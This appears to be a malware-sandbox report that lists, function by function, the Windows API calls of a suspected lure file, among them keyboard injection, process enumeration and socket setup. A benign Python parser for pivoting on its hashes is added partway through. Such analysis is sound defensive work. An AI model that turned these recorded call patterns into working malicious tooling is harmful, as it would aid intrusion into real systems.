                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                      • String ID: 0
                                                                                      • API String ID: 135850232-4108050209
                                                                                      • Opcode ID: dc44fa1bf618d321511555fac3bb8570c6593337219b7d804a0c28d7e7b4c4f5
                                                                                      • Instruction ID: 523b40525d9952b4af78ab7dcca7c7262adc0419d9965458090293cb29807037
                                                                                      • Opcode Fuzzy Hash: dc44fa1bf618d321511555fac3bb8570c6593337219b7d804a0c28d7e7b4c4f5
                                                                                      • Instruction Fuzzy Hash: 3041BE312043519FD724DF25E884B6EBBE8BF95320F008A1DFAA5972D1D730E914CBA2
                                                                                      APIs
                                                                                        • Part of subcall function 0012DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0012CF22,?), ref: 0012DDFD
                                                                                        • Part of subcall function 0012DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0012CF22,?), ref: 0012DE16
                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0012CF45
                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0012CF7F
                                                                                      • SHFileOperationW.SHELL32(?), ref: 0012D061
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: FileFullNamePath$MoveOperationlstrcmpi
                                                                                      • String ID: \*.*
                                                                                      • API String ID: 67141772-1173974218
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0015CC08,00000000,?,?,?,?), ref: 001544AA
                                                                                      • GetWindowLongW.USER32 ref: 001544C7
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001544D7
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Window$Long
                                                                                      • String ID: SysTreeView32
                                                                                      • API String ID: 847901565-1698111956
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00153F40
                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00153F54
                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00153F78
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window
                                                                                      • String ID: SysMonthCal32
                                                                                      • API String ID: 2326795674-1439706946
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00154705
                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00154713
                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0015471A
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                      • String ID: msctls_updown32
                                                                                      • API String ID: 4014797782-2298589950
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00153840
                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00153850
                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00153876
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: MessageSend$MoveWindow
                                                                                      • String ID: Listbox
                                                                                      • API String ID: 3315199576-2633736733
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00134A08
                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00134A5C
                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,0015CC08), ref: 00134AD0
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                      • String ID: %lu
                                                                                      • API String ID: 2507767853-685833217
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0015424F
                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00154264
                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00154271
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: msctls_trackbar32
                                                                                      • API String ID: 3850602802-1010561917
                                                                                      APIs
                                                                                        • Part of subcall function 00122DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00122DC5
                                                                                        • Part of subcall function 00122DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00122DD6
                                                                                        • Part of subcall function 00122DA7: GetCurrentThreadId.KERNEL32 ref: 00122DDD
                                                                                        • Part of subcall function 00122DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00122DE4
                                                                                      • GetFocus.USER32 ref: 00122F78
                                                                                        • Part of subcall function 00122DEE: GetParent.USER32(00000000), ref: 00122DF9
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00122FC3
                                                                                      • EnumChildWindows.USER32(?,0012303B), ref: 00122FEB
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows
                                                                                      • String ID: %s%d
                                                                                      • API String ID: 2776554818-1110647743
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001558C1
                                                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001558EE
                                                                                      • DrawMenuBar.USER32(?), ref: 001558FD
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Menu$InfoItem$Draw
                                                                                      • String ID: 0
                                                                                      • API String ID: 3227129158-4108050209
APIs
• GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0011D3BF
• FreeLibrary.KERNEL32 ref: 0011D3E5
Strings
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: GetSystemWow64DirectoryW$X64
• API String ID: 3013587201-2590602151
• Opcode ID: 67a9246ead4631ef90ec1755aafb41c8aa3cf42b837e57bbe9d318bdab56b602
• Instruction ID: 843111912f1cd98d8e6a3c2ae258016f35b64ec2cf95ae0fd5d02685cc91741b
• Opcode Fuzzy Hash: 67a9246ead4631ef90ec1755aafb41c8aa3cf42b837e57bbe9d318bdab56b602
• Instruction Fuzzy Hash: D0F0ECB5415B11DAD77C56109CC89E93314BF11711F658177E033F5095EB70C9C1C692
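Every function record in this listing has the same shape: an optional APIs section (one bullet per call site, ordinal-only imports shown as #N.MODULE), an optional Strings section, the Memory Dump Source block, the IDA-plugin snapshot name and the Similarity block, which always ends with the Instruction Fuzzy Hash. Pivoting on Opcode IDs or API chains across several reports is much easier once those records are structured data. The parser below is an added example, not code from Joe Sandbox or its IDA plugin; it assumes the layout just described (record terminated by Instruction Fuzzy Hash, "Download File" link residue glued to Associated lines) and uses a constructed sample built from two records copied from this report:

```python
"""Parse Joe Sandbox IDA-plugin function records ('APIs' / 'Memory Dump Source' / 'Similarity'
blocks) into dicts so API chains, Opcode IDs and fuzzy hashes can be pivoted on across reports."""
import re
from typing import Dict, List, Optional

_API_RE = re.compile(
    r"^(?P<name>[^.\s(]+)\.(?P<module>\w+)"  # GetProcAddress.KERNEL32 or #21.WSOCK32 (ordinal import)
    r"(?:\((?P<args>[^)]*)\))?"             # argument list as recorded by the sandbox, if any
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"   # call-site address inside the memory dump
)
_SUBCALL_RE = re.compile(r"^Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s*(?P<rest>.*)$")
_FIELD_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<val>.*)$")
_SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def _clean(line: str) -> str:
    # Drop indentation, the bullet glyph and the "Download File" link residue.
    s = line.strip().lstrip("•").strip()
    return s[: -len("Download File")].rstrip() if s.endswith("Download File") else s


def parse_api_line(text: str) -> Optional[Dict[str, object]]:
    """One API bullet, or a nested 'Part of subcall function XXXXXXXX: ...' line (callee kept)."""
    subcall = None
    m = _SUBCALL_RE.match(text)
    if m:
        subcall, text = m.group("fn"), m.group("rest")
    m = _API_RE.match(text)
    if not m:
        return None
    args = m.group("args")
    return {"name": m.group("name"), "module": m.group("module"),
            "args": args.split(",") if args else [], "ref": m.group("ref"), "subcall": subcall}


def parse_records(report_text: str) -> List[Dict[str, object]]:
    """Split the listing into function records; each record ends at its Instruction Fuzzy Hash."""
    records: List[Dict[str, object]] = []
    cur: Dict[str, object] = {"apis": [], "strings": [], "dumps": [], "fields": {}}
    section = None
    for raw in report_text.splitlines():
        line = _clean(raw)
        if not line:
            continue
        if line in _SECTIONS:
            section = line
            continue
        if section == "APIs":
            api = parse_api_line(line)
            if api:
                cur["apis"].append(api)
            continue
        if section == "Strings":
            cur["strings"].append(line)
            continue
        m = _FIELD_RE.match(line)
        if not m:
            continue
        key, val = m.group("key"), m.group("val")
        if section == "Memory Dump Source":
            cur["dumps"].append({"role": key, "value": val})  # Source File / Associated
        else:
            cur["fields"][key] = val                           # Snapshot File, API ID, Opcode ID, ...
        if key == "Instruction Fuzzy Hash":                    # terminator of every record
            records.append(cur)
            cur, section = {"apis": [], "strings": [], "dumps": [], "fields": {}}, None
    return records


def api_chain(record: Dict[str, object]) -> List[str]:
    """'MODULE!Name' sequence in call-site order, e.g. ['KERNEL32!GetProcAddress', 'KERNEL32!FreeLibrary']."""
    return [f"{a['module']}!{a['name']}" for a in record["apis"]]


def records_calling(records: List[Dict[str, object]], api: str) -> List[str]:
    """Opcode IDs of the records whose chain contains `api` (the key to pivot on in other reports)."""
    return [r["fields"].get("Opcode ID", "") for r in records if api in api_chain(r)]


# Constructed sample: two records copied from this report and trimmed; one Associated line keeps the residue.
SAMPLE = """\
APIs
• GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0011D3BF
• FreeLibrary.KERNEL32 ref: 0011D3E5
Strings
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: GetSystemWow64DirectoryW$X64
• Opcode ID: 67a9246ead4631ef90ec1755aafb41c8aa3cf42b837e57bbe9d318bdab56b602
• Instruction Fuzzy Hash: D0F0ECB5415B11DAD77C56109CC89E93314BF11711F658177E033F5095EB70C9C1C692
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00141AFD
• WSAGetLastError.WSOCK32 ref: 00141B0B
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00141B8A
Similarity
• API ID: ErrorLast$socket
• String ID:
• Opcode ID: 7350b13cb3838a38fa756adafc7d80cc4e35aafcf22c63578a73d96a285850cc
• Instruction Fuzzy Hash: EF417B74600300AFE720AF24C886F6A77A5EB44718F54849CF91A9F7D3D772ED828B90
"""
```

Feed the whole report text to `parse_records` and use `records_calling(recs, "KERNEL32!GetProcAddress")` or `api_chain` to pull out the call sequences behind the signatures in the overview; the Opcode ID is the stable value to search for in other reports, since the Instruction ID and fuzzy hashes vary with the surrounding code.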
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fa20f8bdc32a29c9d9bf954c5b369f69decf51bbd6bfbc091d69c41e32cf6e24
• Instruction ID: 140dc9c4427a502f4f04f1e133e49f68c32d01f4728729ef2b451d28bd17b72d
• Opcode Fuzzy Hash: fa20f8bdc32a29c9d9bf954c5b369f69decf51bbd6bfbc091d69c41e32cf6e24
• Instruction Fuzzy Hash: A4C18D75A0022AEFDB05CFA4D894EAEB7B5FF48304F118698E405EB252C731ED91CB90
APIs
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: Variant$ClearInitInitializeUninitialize
• String ID:
• API String ID: 1998397398-0
• Opcode ID: 78ee8f390357db302fcbb92903cc392618d6c991ab253639aae04b7d9006d7ba
• Instruction ID: d4f2990d62423e16dbac07b43c11ac4cb43829ad6fffd25b553ebb2a4d181417
• Opcode Fuzzy Hash: 78ee8f390357db302fcbb92903cc392618d6c991ab253639aae04b7d9006d7ba
• Instruction Fuzzy Hash: D9A112756047019FCB00DF28C585A6EB7E5EF88724F05885DF99A9B362DB70EE01CB92
APIs
• GetWindowRect.USER32(00A8EBD0,?), ref: 001562E2
• ScreenToClient.USER32(?,?), ref: 00156315
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00156382
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: cf7aa37cb3f36a3621df46b684cd979d749c9ad3f7c6f0e9666e4e1bdbb2282b
• Instruction ID: e32eddbc66bb03d23f336c6588e703a1f37e9a81fea50f6ac3c6e529ce3953c8
• Opcode Fuzzy Hash: cf7aa37cb3f36a3621df46b684cd979d749c9ad3f7c6f0e9666e4e1bdbb2282b
• Instruction Fuzzy Hash: 2E513D74A00209EFCF10DF68D881AAE7BB5FF55365F508169F8699B2A0D730ED85CB90
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 00141AFD
• WSAGetLastError.WSOCK32 ref: 00141B0B
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00141B8A
• WSAGetLastError.WSOCK32 ref: 00141B94
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: ErrorLast$socket
• String ID:
• API String ID: 1881357543-0
• Opcode ID: 7350b13cb3838a38fa756adafc7d80cc4e35aafcf22c63578a73d96a285850cc
• Instruction ID: de808eca79781f852cb17f6ae37c76e9c7391132097e6627b5667ae5bd318dd0
• Opcode Fuzzy Hash: 7350b13cb3838a38fa756adafc7d80cc4e35aafcf22c63578a73d96a285850cc
• Instruction Fuzzy Hash: EF417B74600300AFE720AF24C886F6A77A5EB44718F54849CF91A9F7D3D772ED828B90
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00135783
• GetLastError.KERNEL32(?,00000000), ref: 001357A9
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001357CE
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001357FA
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: 37ca6e10bf80499cccb6ec8d1b68318515751ad0cf7393dc171c95a95453a5bf
• Instruction ID: cb0e92969092b4d44ad96ee3edcce2164422ffc7cbc21b11be961ed8967da12c
• Opcode Fuzzy Hash: 37ca6e10bf80499cccb6ec8d1b68318515751ad0cf7393dc171c95a95453a5bf
• Instruction Fuzzy Hash: BF411739600A10DFCB11EF15C445A5EBBE2EF89720F598498E84AAB362CB70FD41DF91
APIs
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00155352
• GetWindowLongW.USER32(?,000000F0), ref: 00155375
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00155382
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001553A8
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: LongWindow$InvalidateMessageRectSend
• String ID:
• API String ID: 3340791633-0
• Opcode ID: 54f38615145cc719df36c6efe18e0f95a45c8edd91cb99ee773a10ef868928b9
• Instruction ID: e78f15492936e14a999a339069147b8eb0fa61a4856b8523ca8560d0f9d27364
• Opcode Fuzzy Hash: 54f38615145cc719df36c6efe18e0f95a45c8edd91cb99ee773a10ef868928b9
• Instruction Fuzzy Hash: 6631B434A55A08EFEB749F14CC25BE83767BB043D2F584112FE299E2E1C7B09988D741
APIs
• GetKeyboardState.USER32(?,753CA2E0,?,00008000), ref: 0012ABF1
• SetKeyboardState.USER32(00000080,?,00008000), ref: 0012AC0D
• PostMessageW.USER32(00000000,00000101,00000000), ref: 0012AC74
• SendInput.USER32(00000001,?,0000001C,753CA2E0,?,00008000), ref: 0012ACC6
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: e275dc8c3266b06bc4737ba39e0e89b6846a6ac07d4d248c82eb9b94ccf5461b
• Instruction ID: f4af0d687ffba7f4fffba653c7e76c2b9bd81ed11d6b7b080cb0c1110595987c
• Opcode Fuzzy Hash: e275dc8c3266b06bc4737ba39e0e89b6846a6ac07d4d248c82eb9b94ccf5461b
• Instruction Fuzzy Hash: FB312830A04328AFFF38CF64EC047FE7BA5AF85310F84421AE481562D1C3749AB58792
APIs
• ClientToScreen.USER32(?,?), ref: 0015769A
• GetWindowRect.USER32(?,?), ref: 00157710
• PtInRect.USER32(?,?,00158B89), ref: 00157720
• MessageBeep.USER32(00000000), ref: 0015778C
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: 7f46257fa5d0b57ed5d4011eb64d81bcc205696a05a9053bbf202423a061e4d2
• Instruction ID: 7735b5eb68cd4792f07715b995a37310c8838926209ed6c65e6301c6f1348354
• Opcode Fuzzy Hash: 7f46257fa5d0b57ed5d4011eb64d81bcc205696a05a9053bbf202423a061e4d2
• Instruction Fuzzy Hash: 5841AF34605255EFCB02CF58E89AEA977F4FB49306F1540A9E8249F2A1C330A989CF90
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32 ref: 001516EB
                                                                                        • Part of subcall function 00123A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00123A57
                                                                                        • Part of subcall function 00123A3D: GetCurrentThreadId.KERNEL32 ref: 00123A5E
                                                                                        • Part of subcall function 00123A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001225B3), ref: 00123A65
                                                                                      • GetCaretPos.USER32(?), ref: 001516FF
                                                                                      • ClientToScreen.USER32(00000000,?), ref: 0015174C
                                                                                      • GetForegroundWindow.USER32 ref: 00151752
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                      • String ID:
                                                                                      • API String ID: 2759813231-0
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 00124C95
                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00124CB2
                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00124CEA
                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00124D10
                                                                                      Similarity
                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2796087071-0
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0012D501
                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0012D50F
                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0012D52F
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0012D5DC
                                                                                      Similarity
                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                      • String ID:
                                                                                      • API String ID: 420147892-0
                                                                                      APIs
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                      • GetCursorPos.USER32(?), ref: 00159001
                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00117711,?,?,?,?,?), ref: 00159016
                                                                                      • GetCursorPos.USER32(?), ref: 0015905E
                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00117711,?,?,?), ref: 00159094
                                                                                      Similarity
                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2864067406-0
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNEL32(?,0015CB68), ref: 0012D2FB
                                                                                      • GetLastError.KERNEL32 ref: 0012D30A
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0012D319
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0015CB68), ref: 0012D376
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 2267087916-0
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0015280A
                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00152824
                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00152832
                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00152840
                                                                                      Similarity
                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                      • String ID:
                                                                                      • API String ID: 2169480361-0
                                                                                      APIs
                                                                                        • Part of subcall function 00128D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0012790A,?,000000FF,?,00128754,00000000,?,0000001C,?,?), ref: 00128D8C
                                                                                        • Part of subcall function 00128D7D: lstrcpyW.KERNEL32(00000000,?,?,0012790A,?,000000FF,?,00128754,00000000,?,0000001C,?,?,00000000), ref: 00128DB2
                                                                                        • Part of subcall function 00128D7D: lstrcmpiW.KERNEL32(00000000,?,0012790A,?,000000FF,?,00128754,00000000,?,0000001C,?,?), ref: 00128DE3
                                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00128754,00000000,?,0000001C,?,?,00000000), ref: 00127923
                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00128754,00000000,?,0000001C,?,?,00000000), ref: 00127949
                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00128754,00000000,?,0000001C,?,?,00000000), ref: 00127984
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                      • String ID: cdecl
                                                                                      • API String ID: 4031866154-3896280584
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00157D0B
                                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00157D2A
                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00157D42
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0013B7AD,00000000), ref: 00157D6B
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                      Similarity
                                                                                      • API ID: Window$Long
                                                                                      • String ID:
